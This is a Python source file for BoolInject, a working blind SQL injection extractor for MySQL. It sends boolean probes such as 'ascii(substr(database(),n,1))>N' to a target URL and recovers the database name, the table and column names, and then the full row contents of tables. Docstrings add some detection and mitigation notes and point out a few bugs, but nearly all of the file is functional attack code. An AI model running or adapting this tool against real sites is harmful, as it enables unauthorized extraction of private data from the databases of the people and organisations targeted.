class BoolInject:
    """Boolean-based blind SQL injection extractor (MySQL dialect).

    Every probe is one HTTP GET to ``self.url`` with the literal ``*``
    placeholder replaced by a boolean SQL expression; the probe is judged
    "true" when the response status is 200 and ``self.flag`` occurs in the
    body.  Strings are recovered one character at a time by a binary search
    over ``ascii(substr(...))>N`` (see the ``max``/``min`` loops), so the
    request count grows with every length and character guessed.

    Defender's notes (all derived from the probes below):
    - Observable signal: long bursts of requests to one endpoint that differ
      only in an integer, containing ``length(database())=``,
      ``information_schema.tables`` / ``information_schema.columns``, and
      ``ascii(substr(...))>``.  Request-pattern rules and per-client rate
      limiting on that shape are the detection surface; the oracle itself is
      a content difference between true and false responses.
    - Root-cause mitigation on the server side is parameterized queries (the
      injected text reaches the SQL engine unescaped) and uniform responses
      that do not leak the truth value of a condition.
    - Characters below 33 or above 126 cannot be resolved by the 32..126
      search window and are reported as the window edge.
    """

    def __init__(self, url: str, flag: str):
        """Store the target URL template and the true-response marker.

        Args:
            url: URL containing a ``*`` at the injection point.  It is also
                passed through ``str.format`` later, so ``{``/``}`` in the
                URL itself would break the probes.
            flag: substring whose presence in a 200 response marks "true".
        """
        self.url = url
        # NOTE(review): `requests` is not imported in the visible part of the
        # file; the import must live above this class.
        self.req = requests.session()
        self.flag = flag

    def db(self):
        """Recover the current database name.

        Returns:
            The database name, or ``None`` when no length in 1..49 matched.
        """
        name = ''
        name_length = 0
        # Database name length: first matching value in 1..49 wins.
        payload = 'length(database())={num}'
        url = self.url.replace('*', payload)
        for i in range(1, 50):
            r = self.req.get(url.format(num=i))
            if r.status_code == 200 and r.text.find(self.flag) != -1:
                name_length = i
                break
        if name_length == 0:
            return
        else:
            print('database name length: %s' % name_length)
        # Database name: one binary search (32..126) per character position.
        payload = 'ascii(substr(database(),{len},1))>{ascii}'
        url = self.url.replace('*', payload)
        for n in range(1, name_length + 1):
            max = 126
            min = 32
            while abs(max - min) > 1:
                mid = int((max + min) / 2)
                r = self.req.get(url.format(len=n, ascii=mid))
                if r.status_code == 200 and r.text.find(self.flag) != -1:
                    min = mid
                else:
                    max = mid
            # Loop ends with max - min == 1 and ascii > min, so the char is max.
            name += chr(max)
        print("database name: %s" % name)
        return name

    # # all databases()
    # def dbs(self):
    #     dbs = []
    #     db_count = 0
    #     # number of databases
    #     payload = "(select count(SCHEMA_NAME) from information_schema.schemata)={num}"
    #     url = self.url.replace('*', payload)
    #     for i in range(1, 100):
    #         print(url.format(num=i))
    #         r = self.req.get(url.format(num=i))
    #         if r.status_code == 200 and r.text.find(self.flag) != -1:
    #             db_count = i
    #             break
    #     if db_count:
    #         print('tables count: %s' % db_count)
    #     else:
    #         return
    #     pass

    def tables(self, db: str):
        """Recover the table names of schema ``db``.

        Args:
            db: schema name, interpolated unquoted into the probe template.

        Returns:
            List of table names (tables whose length could not be found are
            skipped), or ``None`` when no table count in 1..99 matched.
        """
        tables = []
        tables_count = 0
        # Number of tables: first matching value in 1..99 wins.
        payload = "(select count(table_name) from information_schema.tables where table_schema='{db}')={num}"
        url = self.url.replace('*', payload)
        for i in range(1, 100):
            r = self.req.get(url.format(num=i, db=db))
            if r.status_code == 200 and r.text.find(self.flag) != -1:
                tables_count = i
                break
        if tables_count == 0:
            return
        else:
            print('tables count: %s' % tables_count)
        # One table per `limit {count},1` offset.
        for table_count in range(0, tables_count):
            table_name = ''
            tables_length = 0
            # Table name length.  No `break` here: all 99 probes are always
            # sent and the last matching value is kept.
            payload = "length(substr((select table_name from information_schema.tables where table_schema='{db}' limit {count},1),1))={num}"
            url = self.url.replace('*', payload)
            for i in range(1, 100):
                r = self.req.get(url.format(db=db, count=table_count, num=i))
                if r.status_code == 200 and r.text.find(self.flag) != -1:
                    tables_length = i
            if tables_length == 0:
                print('table %s: 获取长度失败' % table_count)
                continue
            else:
                print('table %s: 长度%s' % (table_count, tables_length))
            # Table name: binary search per character position.
            payload = "ascii(substr((select table_name from information_schema.tables where table_schema='{db}' limit {count},1),{len},1))>{ascii}"
            url = self.url.replace('*', payload)
            for i in range(1, tables_length + 1):
                max = 126
                min = 32
                while abs(max - min) > 1:
                    mid = int((max + min) / 2)
                    r = self.req.get(url.format(db=db, count=table_count, len=i, ascii=mid))
                    if r.status_code == 200 and r.text.find(self.flag) != -1:
                        min = mid
                    else:
                        max = mid
                table_name += chr(max)
            print('table %s: %s' % (table_count, table_name))
            tables.append(table_name)
        return tables

    def columns(self, db: str, table: str):
        """Recover the column names of ``db.table``.

        Args:
            db: schema name, interpolated unquoted into the probe template.
            table: table name, interpolated unquoted into the probe template.

        Returns:
            List of column names (columns whose length could not be found are
            skipped).  The ``None`` branch below is unreachable, see the note
            on ``columns_count``.
        """
        columns_name = []
        # NOTE(review): starts at 8 rather than 0, so the `== 0` guard below
        # can never trigger; if no count probe matches, 8 columns are assumed.
        columns_count = 8
        # Number of columns.  No `break`: all 49 probes are sent, last match kept.
        payload = "(select count(column_name) from information_schema.columns where table_name='{table}' and TABLE_SCHEMA='{db}')={num}"
        url = self.url.replace('*', payload)
        for i in range(1, 50):
            r = self.req.get(url.format(db=db, table=table, num=i))
            if r.status_code == 200 and r.text.find(self.flag) != -1:
                columns_count = i
        if columns_count == 0:
            return
        else:
            print('columns count: %s' % columns_count)
        # One column per `limit {count},1` offset.
        for column_count in range(0, columns_count):
            column_name = ''
            column_length = 0
            # Column name length.  No `break`: all 99 probes are sent.
            payload = "length(substr((select column_name from information_schema.columns where TABLE_SCHEMA='{db}' and table_name='{table}' limit {count},1),1))={num}"
            url = self.url.replace('*', payload)
            for i in range(1, 100):
                r = self.req.get(url.format(db=db, table=table, count=column_count, num=i))
                if r.status_code == 200 and r.text.find(self.flag) != -1:
                    column_length = i
            if column_length == 0:
                print('table %s column %s: 获取列长度失败' % (table, column_count))
                continue
            else:
                print('table %s column %s: 长度%s' % (table, column_count, column_length))
            # Column name: binary search per character position.
            payload = "ascii(substr((select column_name from information_schema.columns where TABLE_SCHEMA='{db}' and table_name='{table}' limit {count},1),{len},1))>{ascii}"
            url = self.url.replace('*', payload)
            for i in range(1, column_length + 1):
                max = 126
                min = 32
                while abs(max - min) > 1:
                    mid = int((max + min) / 2)
                    r = self.req.get(url.format(db=db, table=table, count=column_count, len=i, ascii=mid))
                    if r.status_code == 200 and r.text.find(self.flag) != -1:
                        min = mid
                    else:
                        max = mid
                column_name += chr(max)
            print('table %s column %s: %s' % (table, column_count, column_name))
            columns_name.append(column_name)
        return columns_name

    # columns: list
    def dump(self, db: str, table: str, columns: list[str]):
        """Recover the contents of ``columns`` for every row of ``db.table``.

        The row count is itself recovered as a decimal string (its digit
        count first, then each digit), and for every row and column the
        value's length is recovered the same way before the value itself.

        Args:
            db: schema name, interpolated unquoted into the probe template.
            table: table name, interpolated unquoted into the probe template.
            columns: column names to read, e.g. the result of ``columns()``.

        Returns:
            List of ``{column: value}`` dicts, one per row, or ``None`` when
            the row-count string could not be recovered.  ``int(data_count)``
            raises ``ValueError`` if a non-digit character was recovered.
        """
        data = []
        data_count = ''
        # Row count: number of decimal digits first (1..9, no `break`).
        data_count_str_length = 0
        payload = "(select length(concat(count(*))) from {db}.{table})={len}"
        url = self.url.replace('*', payload)
        for i in range(1, 10):
            r = self.req.get(url.format(db=db, table=table, len=i))
            if r.status_code == 200 and r.text.find(self.flag) != -1:
                data_count_str_length = i
        # Then each digit of the count via binary search.
        payload = "ascii(substr((select concat(count(*)) from {db}.{table}), {len}, 1))>{ascii}"
        url = self.url.replace('*', payload)
        for i in range(1, data_count_str_length + 1):
            max = 126
            min = 32
            while abs(max - min) > 1:
                mid = int((max + min) / 2)
                r = self.req.get(
                    url.format(db=db, table=table, len=i, ascii=mid))
                if r.status_code == 200 and r.text.find(self.flag) != -1:
                    min = mid
                else:
                    max = mid
            data_count += chr(max)
        if data_count:
            print("table %s: 共%s条数据" % (table, data_count))
        else:
            print("table %s: 无数据" % table)
            return
        # Row-by-row extraction.
        for data_row_num in range(0, int(data_count)):
            data_row = {}
            for column in columns:
                # Length of {column} in row {data_row_num}: digit count first
                # (1..9, no `break`), then each digit.
                row_length = ''
                row_str_length = 0
                payload = "(select length(concat(length({column}))) from {db}.{table} limit {row},1)={len}"
                url = self.url.replace('*', payload)
                for i in range(1, 10):
                    r = self.req.get(url.format(column=column, db=db, table=table, len=i, row=data_row_num))
                    if r.status_code == 200 and r.text.find(self.flag) != -1:
                        row_str_length = i
                payload = "ascii(substr((select concat(length({column})) from {db}.{table} limit {row},1), {len}, 1))>{ascii}"
                url = self.url.replace('*', payload)
                for i in range(1, row_str_length + 1):
                    max = 126
                    min = 32
                    while abs(max - min) > 1:
                        mid = int((max + min) / 2)
                        r = self.req.get(
                            url.format(column=column, db=db, table=table, len=i, row=data_row_num, ascii=mid))
                        if r.status_code == 200 and r.text.find(self.flag) != -1:
                            min = mid
                        else:
                            max = mid
                    row_length += chr(max)
                if not row_length:
                    data_row[column] = ''
                    continue
                # NOTE(review): an empty value gives row_length == '0', so the
                # loop below runs zero times, data_row[column] is never set,
                # and the print after the loop raises KeyError.
                # Recover the value itself: binary search per character.
                payload = "ascii(substr((select concat({column}) from {db}.{table} limit {row},1), {len}, 1))>{ascii}"
                url = self.url.replace('*', payload)
                for l in range(1, int(row_length) + 1):
                    max = 126
                    min = 32
                    while abs(max - min) > 1:
                        mid = int((max + min) / 2)
                        r = self.req.get(
                            url.format(column=column, db=db, table=table, len=l, row=data_row_num, ascii=mid))
                        if r.status_code == 200 and r.text.find(self.flag) != -1:
                            min = mid
                        else:
                            max = mid
                    if data_row.get(column):
                        data_row[column] += chr(max)
                    else:
                        data_row[column] = chr(max)
                print('%s.%s %s: %s' % (table, column, data_row_num, data_row[column]))
            data.append(data_row)
        return data
# c = BoolInject('http://url/*sql', '正确返回字符串')
# c.db()